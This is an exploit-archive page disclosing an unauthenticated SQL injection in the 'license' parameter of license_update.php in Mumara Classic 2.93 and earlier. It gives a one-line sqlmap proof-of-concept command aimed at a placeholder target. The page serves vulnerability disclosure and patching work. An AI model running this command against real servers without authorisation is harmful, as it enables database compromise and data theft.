Mumara Classic 2.93 SQL Injection

Mumara Classic 2.93 SQL Injection: Posted Nov 12, 2021; Authored by Shain Lakin; Mumara Classic versions 2.93 and below suffer from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 92452b70f8e9fe54fbe27bb88ae426682962a9d7dcfd2dec517e8b15aa9ddde2; Download | Favorite | View

Mumara Classic 2.93 SQL Injection

# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
# Date: 2021-11-11
# Exploit Author: (v0yager) Shain Lakin
# Vendor Homepage: https://mumara.com
# Version: <= 2.93
# Tested on: CentOS 7

-==== Vulnerability ====-

An SQL injection vulnerability in license_update.php in Mumara Classic
through 2.93 allows a remote unauthenticated attacker to execute
arbitrary SQL commands via the license parameter.

-==== POC ====-

Using SQLMap:

sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql

Top Authors In Last 30 Days

Red Hat 200 files
Ubuntu 105 files
indoushka 31 files
Debian 23 files
CraCkEr 15 files
Gentoo 14 files
Google Security Research 12 files
Mirabbas Agalarov 9 files
Apple 8 files
nu11secur1ty 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,758)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,866)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,370)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,652)
UNIX (9,246)
UnixWare (186)
Windows (6,557)
Other

Mumara Classic 2.93 SQL Injection

Mumara Classic 2.93 SQL Injection

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mumara Classic 2.93 SQL Injection

Share This

Mumara Classic 2.93 SQL Injection

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems